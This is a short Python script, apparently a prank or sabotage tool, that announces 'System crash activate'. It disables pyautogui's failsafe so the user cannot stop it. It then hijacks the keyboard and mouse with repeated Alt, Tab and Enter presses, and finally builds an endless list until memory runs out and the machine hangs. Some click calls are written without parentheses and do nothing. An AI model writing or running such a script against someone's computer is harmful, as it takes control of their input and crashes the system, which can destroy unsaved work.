import pyautogui
import time
from itertools import count as crash
pyautogui.FAILSAFE=False
time.sleep(5)
print("System crash activate")
time.sleep(1)                   
pyautogui.move(1365,757)
pyautogui.click()
count=0
while True: 
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    pyautogui.press("Alt")
    pyautogui.press("TAB")  
    pyautogui.press("enter")
    pyautogui.move(614,329)
    pyautogui.click
    time.sleep(2)
    list(crash(0))
    


